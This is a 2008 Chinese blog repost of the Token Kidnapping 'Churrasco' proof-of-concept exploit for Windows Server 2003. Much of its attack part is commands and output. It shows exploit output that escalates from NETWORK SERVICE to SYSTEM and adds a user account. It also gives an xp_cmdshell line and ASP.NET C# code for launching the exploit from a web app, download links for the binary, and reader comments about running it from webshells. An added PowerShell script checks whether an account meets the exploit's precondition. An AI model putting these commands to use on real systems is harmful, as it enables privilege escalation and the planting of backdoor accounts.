Blog: 酒水不犯茶水
Token Kidnapping Windows 2003 PoC exploit (tested successfully on Win2K3)
Tested successfully on my Win2k3 CN SP1 box, with every available patch applied.

d:\Churrasco.exe "net user 009 /add"

/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1948
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1696
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1952
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1956
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1960
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x75c
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x754
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
The command completed successfully.

It has been a long time since the Token Kidnapping presentation
(http://www.argeniss.com/research/TokenKidnapping.pdf) was published, so I
decided to release a PoC exploit for Win2k3 that allows executing code
under the SYSTEM account.

Basically, if you can run code under any service in Win2k3 then you can
own Windows; this is because Windows service accounts can
impersonate.
Other processes (not services) that can impersonate are IIS 6 worker
processes, so if you can run code from an ASP .NET or classic ASP web
application then you can own Windows too. If you provide shared
hosting services then I would recommend not allowing users to run this
kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want
to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
// Launch churrasco.exe from the web application's directory and capture its output.
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName = Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;   // required when redirecting output
myP.StartInfo.Arguments = " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

Enjoy.
 Posted by Cesar Cerrudo at 4:10 PM
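The post's precondition is that the foothold account can impersonate: that is what service accounts and IIS 6 worker processes have and an ordinary user does not. The following PowerShell script is an added triage check, not part of Cesar Cerrudo's post or of the Churrasco PoC. It lists the privileges of the current token, flags SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, and locates the process hosting the RpcSs service whose threads the PoC walks. It assumes Windows PowerShell 3.0 or later and an English-locale `whoami /priv` (the State column is parsed as "Enabled"/"Disabled").

```powershell
# Added example, not from the original post or the Churrasco PoC.
# Checks the precondition the post describes: the current account holds
# SeImpersonatePrivilege (true for service accounts and IIS 6 worker
# processes) and locates the RpcSs host process the PoC targets.
# Assumes Windows PowerShell 3.0+ and an English-locale whoami.exe.

function Get-TokenPrivilege {
    # whoami /priv prints a header and one row per privilege:
    #   Privilege Name   Description   State
    # Columns are separated by runs of two or more spaces.
    whoami /priv |
        Where-Object { $_ -match '^Se\w+Privilege' } |
        ForEach-Object {
            $cols = $_ -split '\s{2,}'
            [pscustomobject]@{
                Name  = $cols[0]
                State = $cols[-1]   # 'Enabled' or 'Disabled'
            }
        }
}

function Test-TokenKidnappingPrecondition {
    $privs = Get-TokenPrivilege

    # Presence is what matters, not State: a process can enable a disabled
    # privilege it holds via AdjustTokenPrivileges, so do not filter on State.
    $hasImpersonate   = [bool]($privs | Where-Object Name -eq 'SeImpersonatePrivilege')
    $hasAssignPrimary = [bool]($privs | Where-Object Name -eq 'SeAssignPrimaryTokenPrivilege')

    # RpcSs is the service whose threads the PoC searches for an impersonation token.
    $rpcss = Get-CimInstance -ClassName Win32_Service -Filter "Name='RpcSs'"

    [pscustomobject]@{
        Identity                      = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
        SeImpersonatePrivilege        = $hasImpersonate
        SeAssignPrimaryTokenPrivilege = $hasAssignPrimary
        RpcSsPid                      = $rpcss.ProcessId
        RpcSsRunsAs                   = $rpcss.StartName
        MeetsPrecondition             = $hasImpersonate
    }
}

Test-TokenKidnappingPrecondition | Format-List
```

Run it from the same context you would run the PoC from (a service, an xp_cmdshell call, or an ASP.NET page that launches powershell.exe): the Identity field should match the "Current User" line the PoC prints, and a foothold whose token lacks SeImpersonatePrivilege is not the case the post is describing, whatever the Windows version.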


Compiled build:
http://www.blogjava.net/Files/baicker/Churrasco.rar

Posted on 2008-10-09 10:52 by 009, 4024 views, 11 comments. Category: Network resources / Hacking techniques

Comments

# re: Token Kidnapping Windows 2003 PoC exploit (tested successfully on Win2K3) 2008-10-09 14:43 xiaomi

I don't know why MS hasn't patched this vulnerability.

# re: Token Kidnapping Windows 2003 PoC exploit (tested successfully on Win2K3) 2008-10-09 15:20 雨夜

Tested on 5 machines, 4 and a half succeeded; that one lost power.
Good stuff.

# re: Token Kidnapping Windows 2003 PoC exploit (tested successfully on Win2K3) 2008-10-09 16:00 saint

Does it only work in the "Exploiting IIS 6 with ASP .NET" setup?
There aren't many webshells that can execute commands. Heh.

# re: Token Kidnapping Windows 2003 PoC exploit (tested successfully on Win2K3) 2008-10-09 17:49 网络ak48

So evil........ So very evil.

# re: Token Kidnapping Windows 2003 PoC exploit (tested successfully on Win2K3) 2008-10-10 10:42 人族

Why doesn't it work when I test it on my own SP1? Does it work if it isn't the CN version?
It prints:
/churrasco/-->Running command with SYSTEM Token
/churrasco/-->Couldn't run command, try again!

It can't run the command.

# re: Token Kidnapping Windows 2003 PoC exploit (tested successfully on Win2K3)[not logged in] 2008-10-10 11:09 hh

Isn't the command d:\path\Churrasco.exe "net user admin /add"?
So why does it keep telling me the format is wrong?

# re: Token Kidnapping Windows 2003 PoC exploit (tested successfully on Win2K3) 2008-10-10 19:03 jjjyyy

Bro, the build you compiled throws an error:
http://www.jydown.cn/up/2003.jpg

# re: Token Kidnapping Windows 2003 PoC exploit (tested successfully on Win2K3) 2008-10-10 21:53 深蓝T透

That isn't an error; it's just that your environment doesn't work.
On 2003 + IIS 6.0 it almost always succeeds.
I tested it on a Korean box, no problem!

# re: Token Kidnapping Windows 2003 PoC exploit (tested successfully on Win2K3)[not logged in] 2008-10-12 18:00 Sin

Why can't I run it from my webshell? 2003 + IIS 6.
(screenshot: http://www.bnec.cn/blog/data/1/netfolder/未命名.jpg)
It keeps saying: /churrasco/-->Usage: Churrasco.exe "command to run"

# re: Token Kidnapping Windows 2003 PoC exploit (tested successfully on Win2K3) 2008-10-14 22:10 郁郁葱葱

/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1012
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 1016
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1020
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 1024
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x1f58
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x1f50
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Couldn't run command, try again!

# re: Token Kidnapping Windows 2003 PoC exploit (tested successfully on Win2K3) 2008-10-14 22:10 郁郁葱葱

What's going on here?

This post was last edited by the author on 2008-10-09 11:01

2006 © 009's site. No rights reserved, copy freely.
Comments and suggestions: e-mail baicker@hotmail.com